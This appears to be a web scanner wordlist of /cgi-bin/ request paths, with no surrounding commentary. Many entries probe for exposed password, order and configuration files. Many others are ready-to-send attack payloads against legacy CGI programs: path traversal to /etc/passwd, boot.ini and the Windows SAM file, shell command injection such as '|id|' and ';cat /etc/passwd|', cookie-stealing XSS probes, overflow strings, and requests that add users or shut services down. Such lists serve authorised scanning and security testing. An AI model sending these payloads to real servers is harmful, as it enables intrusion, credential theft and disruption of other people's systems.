%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/no-such-block
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
/cgi-bin/ndcgi.exe
/cgi-bin/ndCGI.exe/
/cgi-bin/netauth.cgi
/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
/cgi-bin/netcat
/cgi-bin/netcat.c
/cgi-bin/netcat.exe
/cgi-bin/netpad.cgi
/cgi-bin/Netwin/CWMail.exe
/cgi-bin/newdesk
/cgi-bin/news.cgi
/cgi-bin/news.cgi?addAuthor
/cgi-bin/news/
/cgi-bin/news/news.cgi
/cgi-bin/news/newsup.pl
/cgi-bin/newsdesk.cgi
/cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/newsgroups.php
/cgi-bin/nimages.php
/cgi-bin/nlog-smb.cgi
/cgi-bin/nlog-smb.pl
/cgi-bin/nonExistentPage.asp
/cgi-bin/nonExistentPage.aspx
/cgi-bin/nonExistentPage.cfm
/cgi-bin/nonExistentPage.cgi
/cgi-bin/nonExistentPage.html
/cgi-bin/nonExistentPage.jhtml
/cgi-bin/nonExistentPage.jsp
/cgi-bin/nonExistentPage.msp
/cgi-bin/nonExistentPage.nsf
/cgi-bin/nonExistentPage.php
/cgi-bin/nonExistentPage.php3
/cgi-bin/nonExistentPage.php4
/cgi-bin/nonExistentPage.pl
/cgi-bin/nonExistentPage.plx
/cgi-bin/nonExistentPage.shtml
/cgi-bin/nonExistentPage.thtml
/cgi-bin/noSuchFile.asp
/cgi-bin/noSuchFile.aspx
/cgi-bin/noSuchFile.cfm
/cgi-bin/noSuchFile.cgi
/cgi-bin/noSuchFile.jhtml
/cgi-bin/noSuchFile.nsf
/cgi-bin/noSuchFile.php
/cgi-bin/noSuchFile.php3
/cgi-bin/noSuchFile.php4
/cgi-bin/noSuchFile.pl
/cgi-bin/noSuchFile.plx
/cgi-bin/noSuchFile.shtml
/cgi-bin/noSuchFile.stm
/cgi-bin/noSuchFile.thtml
/cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/nph-error.pl
/cgi-bin/nph-maillist.pl
/cgi-bin/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../../../etc/services%00
/cgi-bin/nph-proxy.cgi
/cgi-bin/nph-publish
/cgi-bin/nph-publish.cgi
/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
/cgi-bin/nph-test-cgi
/cgi-bin/nph-test-cgi?*
/cgi-bin/nph-test-cgi?/*
/cgi-bin/nph-test.cgi
/cgi-bin/nph-test.cgi?/*
/cgi-bin/ntdaddy.asp
/cgi-bin/ntitar.pl
/cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/officescan/cgi/jdkRqNotify.exe
/cgi-bin/oj.cgi?db=default&uid=%00&userid=hacker&auth=adduser
/cgi-bin/opendir.php?/etc/passwd
/cgi-bin/openwebmail-abook.pl?sessionid=@[PATH]-session-0
/cgi-bin/openwebmail/
/cgi-bin/openwebmail/openwebmail.pl
/cgi-bin/ora_errs.log
/cgi-bin/Order/order_log.dat
/cgi-bin/OrderForm.cgi
/cgi-bin/orders.asp
/cgi-bin/orders.dat
/cgi-bin/orders.htm
/cgi-bin/orders.html
/cgi-bin/orders.txt
/cgi-bin/orders/orders.txt
/cgi-bin/Orders/order_log.dat
/cgi-bin/order_log.dat
/cgi-bin/Output-Build.txt
/cgi-bin/owalogon.asp
/cgi-bin/owa_util.listprint
/cgi-bin/owa_util.showsource
/cgi-bin/owa_util.show_query_columns
/cgi-bin/owa_util.signature
/cgi-bin/page-og.cgi
/cgi-bin/page.cfm
/cgi-bin/pagelog.cgi
/cgi-bin/pagelog.cgi?name=../../../../../etc/passwd
/cgi-bin/pagewrite.cgi?page=|cat%20/etc/passwd|
/cgi-bin/pals-cgi
/cgi-bin/pals-cgi?palsAction=restart&documentName=../../../../../../../etc/passwd
/cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
/cgi-bin/parse-file?TEMPLATE=&lt;script&gt;alert(document.cookie);&lt;/script&gt;
/cgi-bin/pass
/cgi-bin/pass.asp
/cgi-bin/pass.cfg
/cgi-bin/pass.cgi
/cgi-bin/pass.dat
/cgi-bin/pass.data
/cgi-bin/pass.db
/cgi-bin/pass.dbf
/cgi-bin/pass.exe
/cgi-bin/pass.htm
/cgi-bin/pass.html
/cgi-bin/pass.htx
/cgi-bin/pass.ini
/cgi-bin/pass.lst
/cgi-bin/pass.pl
/cgi-bin/pass.txt
/cgi-bin/pass/admins.exe
/cgi-bin/pass/clients.htx
/cgi-bin/pass/pass.htx
/cgi-bin/pass/password.htx
/cgi-bin/pass/passwords.htx
/cgi-bin/pass/users.htx
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/passwd.txt%20.pl
/cgi-bin/password
/cgi-bin/password.asp
/cgi-bin/password.cfg
/cgi-bin/password.cgi
/cgi-bin/password.dat
/cgi-bin/password.data
/cgi-bin/password.db
/cgi-bin/password.dbf
/cgi-bin/password.exe
/cgi-bin/password.htm
/cgi-bin/password.html
/cgi-bin/password.htx
/cgi-bin/password.ini
/cgi-bin/password.lst
/cgi-bin/password.pl
/cgi-bin/password.txt
/cgi-bin/passwords.asp
/cgi-bin/passwords.cfg
/cgi-bin/passwords.cgi
/cgi-bin/passwords.dat
/cgi-bin/passwords.data
/cgi-bin/passwords.db
/cgi-bin/passwords.dbf
/cgi-bin/passwords.exe
/cgi-bin/passwords.htm
/cgi-bin/passwords.html
/cgi-bin/passwords.htx
/cgi-bin/passwords.ini
/cgi-bin/passwords.lst
/cgi-bin/passwords.php3
/cgi-bin/passwords.pl
/cgi-bin/passwords.txt
/cgi-bin/pbcgi.cgi?name=Joe%Camel&email=
/cgi-bin/pbcgi.exe
/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%00
/cgi-bin/PDG_Cart/oder.log
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/perl
/cgi-bin/perl.exe
/cgi-bin/perl.exe 
/cgi-bin/perl.exe?-v
/cgi-bin/perl/perl.exe?-v
/cgi-bin/perl/perl?-v
/cgi-bin/perl?
/cgi-bin/perl?-v
/cgi-bin/perlcal
/cgi-bin/perlshop.cgi
/cgi-bin/persists/Test11.asp
/cgi-bin/pfdispaly
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
/cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
/cgi-bin/pfdisplay|pfdisplay|
/cgi-bin/pfieffer.bat
/cgi-bin/pfieffer.cmd
/cgi-bin/pgpmail.pl
/cgi-bin/phf
/cgi-bin/phf.cgi
/cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf.old
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
/cgi-bin/photo/
/cgi-bin/photo/index.cgi
/cgi-bin/photo/manage.cgi
/cgi-bin/photo/protected/manage.cgi
/cgi-bin/php
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/php.exe?c:\boot.ini
/cgi-bin/php.exe?c:\winnt\repair\sam
/cgi-bin/php/mlog.phtml
/cgi-bin/php/mylog.phtml
/cgi-bin/php/php.exe?c:\boot.ini
/cgi-bin/php/php.exe?c:\winnt\repair\sam
/cgi-bin/php3/php.exe?c:\boot.ini
/cgi-bin/php3/php.exe?c:\winnt\repair\sam
/cgi-bin/php4/php.exe?c:\boot.ini
/cgi-bin/php4/php.exe?c:\winnt\repair\sam
/cgi-bin/php?/etc/passwd
/cgi-bin/phptonuke.php?filnavn=/etc/services
/cgi-bin/pi
/cgi-bin/pi?page=document/show_file&id=
/cgi-bin/picview.cgi
/cgi-bin/ping.cgi?host=|127.0.0.1|
/cgi-bin/ping.cgi?host=|id|
/cgi-bin/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../../etc/passwd
/cgi-bin/plusmail
/cgi-bin/pollit/
/cgi-bin/pollit/pollit.cgi
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
/cgi-bin/pollssi.cgi
/cgi-bin/post-query
/cgi-bin/post-query?
/cgi-bin/post.cgi
/cgi-bin/post16.exe
/cgi-bin/post32.exe
/cgi-bin/post32.exe|dir%20c:\
/cgi-bin/post32.exe|echo%20>c:\text.txt
/cgi-bin/postcards.cgi
/cgi-bin/postie.cgi
/cgi-bin/postie.exe
/cgi-bin/postiecgi.exe
/cgi-bin/postinfo.asp
/cgi-bin/postings.cgi
/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
/cgi-bin/post_bug.cgi
/cgi-bin/post_query
/cgi-bin/powerup/
/cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../../etc/passwd
/cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
/cgi-bin/powerup/r.pl?FILE=main.html
/cgi-bin/ppdscgi.cgi
/cgi-bin/ppdscgi.exe
/cgi-bin/printenv
/cgi-bin/prn.nsf
/cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/probe.cgi?olddat=|id|
/cgi-bin/processit.pl
/cgi-bin/Process_Bug.CGI
/cgi-bin/products.dbf
/cgi-bin/profile.cgi
/cgi-bin/profile.php?mode=editprofile
/cgi-bin/program.pl
/cgi-bin/proxy/w3proxy.dll
/cgi-bin/psdoccgi.exe
/cgi-bin/psinclude.cgi?template=|uname%20-a;uptime|
/cgi-bin/psunami.cgi?action=board&board=1&topic=|ls+-al+/|
/cgi-bin/pu3.cgi
/cgi-bin/pu3.pl
/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output_number=10
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10
/cgi-bin/pubs.dbf
/cgi-bin/query
/cgi-bin/query%3f
/cgi-bin/query.idq?CiTemplate=query.idq
/cgi-bin/query.idq?CiTemplate=query.idq%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
/cgi-bin/query.inc
/cgi-bin/query?mss=%2e%2e/config
/cgi-bin/query?mss=../../../../../../../etc/passwd
/cgi-bin/query_string.cgi
/cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
/cgi-bin/quickstore/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
/cgi-bin/quikstore.cfg
/cgi-bin/quikstore.cgi
/cgi-bin/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id|
/cgi-bin/quiz.cgi
/cgi-bin/quizme.cgi
/cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
/cgi-bin/ratlog.cgi
/cgi-bin/rb.dll
/cgi-bin/rcounter.dll
/cgi-bin/Readme
/cgi-bin/README.htm
/cgi-bin/README.html
/cgi-bin/Readme.txt
/cgi-bin/redir.exe
/cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom
/cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Eyahoo%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28document%2EURL%29%3C%2FSCRIPT%3E
/cgi-bin/redirect
/cgi-bin/redirect.cgi
/cgi-bin/redirect.exe
/cgi-bin/register.cgi
/cgi-bin/reg_echo.cgi
/cgi-bin/replicator/webpage.cgi
/cgi-bin/replicator/webpage.cgi/
/cgi-bin/replicator/webpage.cgi/313373/123456789a.htm
/cgi-bin/replicator/webpage.cgi/313373/ukr.htm
/cgi-bin/reports.cgi
/cgi-bin/repost.asp
/cgi-bin/responder.cgi
/cgi-bin/retrieve_password.pl
/cgi-bin/rguest.exe
/cgi-bin/rightfax/fuwww.dll
/cgi-bin/rightfax/fuwww.dll/?
/cgi-bin/rksh
/cgi-bin/rmp_query
/cgi-bin/roads/Search.pl?form=../../../../../../../../../../etc/passwd%00
/cgi-bin/robadmin.cgi
/cgi-bin/robpoll.cgi
/cgi-bin/robpoll.cgi?Admin
/cgi-bin/root.exe
/cgi-bin/root.exe?/c+dir
/cgi-bin/rpcnlog.pl
/cgi-bin/rpm_query
/cgi-bin/rsh
/cgi-bin/rtm.log
/cgi-bin/run.cgi
/cgi-bin/run.exe
/cgi-bin/rwcgi60
/cgi-bin/rwcgi60.exe
/cgi-bin/rwcgi60.exe/
/cgi-bin/rwcgi60/
/cgi-bin/rwcgi60/showenv
/cgi-bin/rwwwshell.pl
/cgi-bin/rxgoogle.cgi?query=<script>alert(document.cookie);</script>
/cgi-bin/s.cgi
/cgi-bin/s.cgi?q=a&tmpl=check
/cgi-bin/samples/
/cgi-bin/samples/asp/viewcode.asp?file=index.asp
/cgi-bin/samples/ctguestb.idc
/cgi-bin/samples/ctguestbook.idc
/cgi-bin/samples/details.idq
/cgi-bin/samples/search/author.idq
/cgi-bin/samples/search/filesize.idq
/cgi-bin/samples/search/filetime.idq
/cgi-bin/samples/search/qfullhit.htw?ciwebhitsfile=/../../../../boot.ini&cirestriction=none&cihilitetype=full
/cgi-bin/samples/search/qsumrhit.htw?ciwebhitsfile=/../../../../boot.ini&cirestriction=none&cihilitetype=full
/cgi-bin/samples/search/query.idq
/cgi-bin/samples/search/queryhit.idq
/cgi-bin/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
/cgi-bin/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
/cgi-bin/samples/search/simple.idq
/cgi-bin/samples/search/webhits.exe
/cgi-bin/samples/Test11.asp
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/sbcgi/sitebuilder.cgi
/cgi-bin/sbox.pl
/cgi-bin/scoadminreg.cgi
/cgi-bin/screamlink.cgi
/cgi-bin/screamtext.cgi
/cgi-bin/script.bat?&dir
/cgi-bin/script.cmd?&dir
/cgi-bin/scripts/*%0a.pl
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/scripts/comments.txt
/cgi-bin/scripts/Fpadmcgi.exe
/cgi-bin/scripts/snorkerz.bat
/cgi-bin/scripts/snorkerz.cmd
/cgi-bin/scripts/superguestconfig
/cgi-bin/scripts/whois.cgi?action=load&whois=check
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/cgi-bin/search
/cgi-bin/search.cgi
/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/cgi-bin/search.cgi?letter=
/cgi-bin/Search.pl
/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
/cgi-bin/search.pl?form=/etc/passwd%00
/cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=
/cgi-bin/search/
/cgi-bin/search/search.cgi
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
/cgi-bin/search/show.pl?url=file/passwd
/cgi-bin/search/tidfinder.cgi
/cgi-bin/search/tidfinder.cgi?2956734
/cgi-bin/security.dbf
/cgi-bin/sendfile.exe
/cgi-bin/sendform.cgi
/cgi-bin/sendform.cgi?to=blah@blah.com
/cgi-bin/sendmail.cgi
/cgi-bin/sendmail.inc
/cgi-bin/sendpage.pl
/cgi-bin/sendtemp.pl
/cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/cgi-bin/sensepost.exe?/c+dir
/cgi-bin/server.log
/cgi-bin/servervar.asp
/cgi-bin/servervariables.asp
/cgi-bin/servervars.asp
/cgi-bin/services
/cgi-bin/servlet
/cgi-bin/session/adminlogin
/cgi-bin/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
/cgi-bin/SGB_DIR/superguestconfig
/cgi-bin/sgdynamo.exe?HTNAME=<script>alert('CSS')</script>
/cgi-bin/sgdynamo.exe?sgdynamo.exe?HTNAME=nonexistent
/cgi-bin/sh
/cgi-bin/shell.pl
/cgi-bin/ShellExample.cgi?../../*
/cgi-bin/shop$db.asp
/cgi-bin/shop.cgi
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
/cgi-bin/shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl|
/cgi-bin/shop.pl/page=shop.cfg
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/orders/orders.txt
/cgi-bin/shopadmin.asp
/cgi-bin/shopdbtest.asp
/cgi-bin/shopper.cgi
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
/cgi-bin/shopplus.cgi
/cgi-bin/shopplus.cgi?DN=biomax1.com&cartid=%cartid%&FILE=;id|
/cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
/cgi-bin/show.pl
/cgi-bin/showcheckins.cgi?person=
/cgi-bin/showfile
/cgi-bin/showfile.asp
/cgi-bin/showstats.cgi
/cgi-bin/showvotes.cgi
/cgi-bin/show_activity.cgi
/cgi-bin/Show_Bug.CGI
/cgi-bin/shtml.ddl
/cgi-bin/shtml.dll
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
/cgi-bin/simplestguest.cgi
/cgi-bin/simplestmail.cgi
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=test@test.com;ls%20-alsi&submit=run
/cgi-bin/sitelist.txt
/cgi-bin/sitestat.asp
/cgi-bin/sitestat.cgi
/cgi-bin/sitestat.htm
/cgi-bin/sitestat.html
/cgi-bin/sitestat.php
/cgi-bin/sitestats.asp
/cgi-bin/sitestats.cgi
/cgi-bin/sitestats.htm
/cgi-bin/sitestats.html
/cgi-bin/sitestats.php
/cgi-bin/siteUserMod.cgi
/cgi-bin/siteUserMod/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/siteUserMod/siteUserMod.cgi
/cgi-bin/site_ftp.pl
/cgi-bin/site_mgmt.htm
/cgi-bin/site_mgmt.html
/cgi-bin/site_searcher.cgi?page=|id|
/cgi-bin/slxweb.dll
/cgi-bin/slxweb.dll/admin
/cgi-bin/slxweb.dll/admin?command=shutdown
/cgi-bin/smartsearch.cgi
/cgi-bin/smartsearch.cgi?keywords=|id|
/cgi-bin/smartsearch/smartsearch.cgi
/cgi-bin/snorkerz.bat
/cgi-bin/snorkerz.cmd
/cgi-bin/SoftCart.exe
/cgi-bin/sojourn.cgi
/cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
/cgi-bin/sojourn.cgi?cat=../../../../../etc/password%00
/cgi-bin/source.asp
/cgi-bin/spin_client.cgi
/cgi-bin/spin_client.cgi?aaaaaaaa
/cgi-bin/spin_client.cgi?buffer_overflow_string
/cgi-bin/sql.inc
/cgi-bin/sql.php3?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/cgi-bin/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd
/cgi-bin/sql.php?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/cgi-bin/sqlbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/sqlconnect.inc
/cgi-bin/sqlnet.log
/cgi-bin/sqlnet.trc
/cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/sqwebmail
/cgi-bin/srchadm/admin.idq
/cgi-bin/srchadm/webhits.exe
/cgi-bin/ss
/cgi-bin/sscd_suncourier.pl
/cgi-bin/ssi
/cgi-bin/ssi/
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/ssi//../../../../../../../../../etc/hosts
/cgi-bin/ssi//../../../../../../../../../etc/passwd
/cgi-bin/ssl_error.log
/cgi-bin/ssl_error_log
/cgi-bin/sso.login.controller
/cgi-bin/standard.inc
/cgi-bin/start.cgi/
/cgi-bin/start.cgi/<script>alert('CSS')</script>
/cgi-bin/stat.asp
/cgi-bin/stat.cgi
/cgi-bin/stat.htm
/cgi-bin/stat.html
/cgi-bin/stat.php
/cgi-bin/stat.pl
/cgi-bin/stat/
/cgi-bin/statistics.asp
/cgi-bin/statistics.cgi
/cgi-bin/statistics.htm
/cgi-bin/statistics.html
/cgi-bin/statistics.php
/cgi-bin/stats-bin-p/reports/index.html
/cgi-bin/stats.asp
/cgi-bin/stats.cgi
/cgi-bin/stats.htm
/cgi-bin/stats.html
/cgi-bin/stats.php
/cgi-bin/stats.pl
/cgi-bin/stats.prf
/cgi-bin/stats.prg
/cgi-bin/stats/
/cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/statsconfig
/cgi-bin/statsconfig.pl
/cgi-bin/stats_old/
/cgi-bin/statusconfig.pl
/cgi-bin/statview.pl
/cgi-bin/store.cgi
/cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
/cgi-bin/store.cgi?StartID=../etc/passwd%00.html
/cgi-bin/store/agora.cgi?cart_id=
/cgi-bin/store/agora.cgi?page=whatever33.html
/cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
/cgi-bin/story.pl?next=../../../etc/passwd%00
/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
/cgi-bin/submit.cgi
/cgi-bin/subscribe.pl
/cgi-bin/suche/
/cgi-bin/suche/hsx.cgi?show=../../../../../../../../../../../../etc/passwd%00
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/suche/hsx.cgi?show=..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
/cgi-bin/support/common.php
/cgi-bin/survey
/cgi-bin/survey.cgi
/cgi-bin/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/cgi-bin/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../../../../../etc/passwd
/cgi-bin/sws/
/cgi-bin/sws/admin.html
/cgi-bin/sws/manager.pl
/cgi-bin/sws/manager.pl?add&pass=PassWord
/cgi-bin/tabit.cgi
/cgi-bin/tablebuild.pl
/cgi-bin/talkback.cgi
/cgi-bin/talkback.cgi?
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/tcsh
/cgi-bin/tdforum/tdforum12.cgi
/cgi-bin/technote/.htolo
/cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/templates/
/cgi-bin/templates/form_header.php?noticemsg=<script>alert()</script>
/cgi-bin/test
/cgi-bin/test-cgi
/cgi-bin/test-cgi.bat
/cgi-bin/test-cgi.bat?%7Cdir%7Csort
/cgi-bin/test-cgi.bat?|
/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.
/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html
/cgi-bin/test-cgi.bat?|ver
/cgi-bin/test-cgi.exe
/cgi-bin/test-cgi.tcl
/cgi-bin/test-cgi?/*
/cgi-bin/test-env
/cgi-bin/test-unix.html
/cgi-bin/test-win.exe?<script>alert("CSS")</script>
/cgi-bin/test.asp
/cgi-bin/test.aspx
/cgi-bin/test.bat
/cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/cgi-bin/test.cgi
/cgi-bin/test.cgi 
/cgi-bin/test.cgi HTTP/1.0\r\n\r\n
/cgi-bin/test.cgi HTTP/1.1\r\n\r\n
/cgi-bin/test.cgi?/*
/cgi-bin/test.cgi?/etc/passwd/* 
/cgi-bin/test.dbf
/cgi-bin/test.exe
/cgi-bin/test.htm
/cgi-bin/test.html
